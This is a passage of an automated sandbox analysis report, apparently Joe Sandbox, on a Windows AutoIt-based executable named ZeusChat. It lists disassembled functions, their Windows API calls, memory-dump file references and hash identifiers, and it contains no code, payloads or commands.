                                                                                                      • Instruction ID: 24ebfaab909f70674116910ae7fb22107fe1a4c77f149f3be981af54b1adf145
                                                                                                      • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction Fuzzy Hash: 06D15A76B06B459AEB10EF61D8801ECB3B5FB44788B844036DE0D57BA9DF78E519C3A0
                                                                                                      Function 00007FF752009D70 Relevance: 6.2, APIs: 4, Instructions: 247fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,00007FF75200475D,?,?,?,00007FF752008FCF,?,?,?,?,?,?,?,00007FF752009D60), ref: 00007FF752009F34
                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00007FF75200475D,?,?,?,00007FF752008FCF,?,?,?,?,?,?,?,00007FF752009D60), ref: 00007FF75204D886
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction ID: 6f906ac518c91a2a926c6da2c13a59e32320b4dca173f00bc832cc7901d22ef9
                                                                                                      • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction Fuzzy Hash: B0B1D872A0A64686EB61EB15E894339E364FB44F90F894135CA5E43794DF7CE449C360
                                                                                                      Function 00007FF7520AF778 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352109105-0
                                                                                                      • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction ID: dd2eb3395dfffd325a61ca0f2286e9226170a829c7a246e4a6ade1fd99c4aad5
                                                                                                      • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction Fuzzy Hash: E0417532A06A4681EB50EF15DC88539B7A0FB44B94FE94136CD1D437A0DFBDE84AC360
                                                                                                      Function 00007FF7520AB278 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                      • String ID:
                                                                                                      • API String ID: 3076010158-0
                                                                                                      • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction ID: 8b345f5a2621f3d8514ff07bbbcf893397e20819a493e605b5f4669ba1a579c3
                                                                                                      • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction Fuzzy Hash: 4F417C33A05A8196EBA0EF66D8806AD77B0FB54B84F984036CE0D17754CF78E859C760
                                                                                                      Function 00007FF75203C5BC Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 4141327611-0
                                                                                                      • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction ID: 6054b9a1e493ea5b04817e6ec59a145168d92ea9f76cd8eec88640d96adb50bc
                                                                                                      • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction Fuzzy Hash: 2741D77390E64686FB61BE10DA40379E690EFA0BB0FAC5131DA4D866C5DFBCD849C720
                                                                                                      Function 00007FF75207C46C Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083639309-0
                                                                                                      • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction ID: 4702dfa17c963d75b165a2869216e5169a16177ab109ced3ba0e73dcd7acc57d
                                                                                                      • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction Fuzzy Hash: 6F415136A1AA9292E710FB61E8845BEE760FB84B94FD84032EA4D03755DFBCD949C710
                                                                                                      Function 00007FF752043C28 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043C41
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043CA3
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043CDD
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043D07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1557788787-0
                                                                                                      • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction ID: 41b4a32dfc448e8d9bcf25184229c202b1467e1d686973259d945f6e2488365f
                                                                                                      • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction Fuzzy Hash: 6B21A231F0979181E624AF15A840029F6A5FB44BD0B9C9134DE8E23BD4DF7CE595C350
                                                                                                      Function 00007FF7520B180C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
                                                                                                      • GetCursorPos.USER32 ref: 00007FF7520B1861
                                                                                                      • TrackPopupMenuEx.USER32 ref: 00007FF7520B1885
                                                                                                      • GetCursorPos.USER32(?,?,00000000,?,?,00007FF75204A35D,?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520B18CC
                                                                                                      • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF75204A35D,?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520B1910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2864067406-0
                                                                                                      • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction ID: 44f4672d04124888f10b81a791d1135be76512ade76eb52677951dd8627c6152
                                                                                                      • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction Fuzzy Hash: 73318A36A09A4581EB20EB15E89437DF760F784F94F984132DA4D47BA8DF7CD84AC710
                                                                                                      Function 00007FF752001AA8 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4127811313-0
                                                                                                      • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction ID: 32769f223167ebd7b91b8b7e7f1f4b2dc837209d6754027126a9b77800399314
                                                                                                      • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction Fuzzy Hash: 46215E32A0964686EA20AB45EC9056EF771FB85B84F984131EA4D43B59CFBCE849C720
                                                                                                      Function 00007FF75200DADC Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3970641297-0
                                                                                                      • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction ID: 94b2a365b42922b0c91eba6fe968836502f13d9af18a7757495a80e50aa6c78c
                                                                                                      • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction Fuzzy Hash: 0E214176A097C58AE7A49B15E8447AAF7A0FB88784F980135DA8D43B54DFBCD488CB10
                                                                                                      Function 00007FF7520B01F8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 357397906-0
                                                                                                      • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction ID: 208c8577584f7846b84131a8f44aa5d0ab4352755b46f285535a6d89013ab9b8
                                                                                                      • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction Fuzzy Hash: 7F21F7B6E04741DEEB40DF78D8442AC7BB1F748B48B444866EE1897B18DB78D958CB50
                                                                                                      Function 00007FF75203B608 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 1447195878-0
                                                                                                      • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction ID: 7db2c676f529c5ccdb55b59837fa8b39a50a445f280a3652a5d5ca36a688df1b
                                                                                                      • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction Fuzzy Hash: 2A016920F0F30E42EA6977319E6617DD151AFA4798FDC4538D91E027D6EDACA84CC220
                                                                                                      Function 00007FF75203CB08 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                      • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction ID: 44fa0ce05576ebec6a09b64d5b949a0f3f772fab88dcc061b953838ab13ee463
                                                                                                      • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction Fuzzy Hash: 01917A63B0E38E45EB10AF259A4036CEB95AB35BE0F588131DB8D47395DE7DE109C310
                                                                                                      Function 00007FF7520722F8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF7520727FF), ref: 00007FF752072538
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContainedObject
                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                      • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction ID: 6cafc05579c2ac13d796ceb80c39fc5b3b448951c128cac4cbb0f4c42508b82a
                                                                                                      • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction Fuzzy Hash: BD915832605B4286DB64EF29E8502ADB3A4FB88F94F998036CF8D43724DF79D849C310
                                                                                                      Function 00007FF75203CF38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                      • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction ID: 1d07a4bbb1ef5505b61c81c83b8fe2eea1d1600770015ecc6070d977e0973249
                                                                                                      • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction Fuzzy Hash: C6516A62B1D7C54AE7249F359E40369AB91EB90B90F8C9231C69C87BC6CF7DD04AC710
                                                                                                      Function 00007FF7520AA67C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3467290483-2160076837
                                                                                                      • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction ID: 31b54e1fc366b09af3bea8e444df80316897c740132634be497df2f24a16b7fb
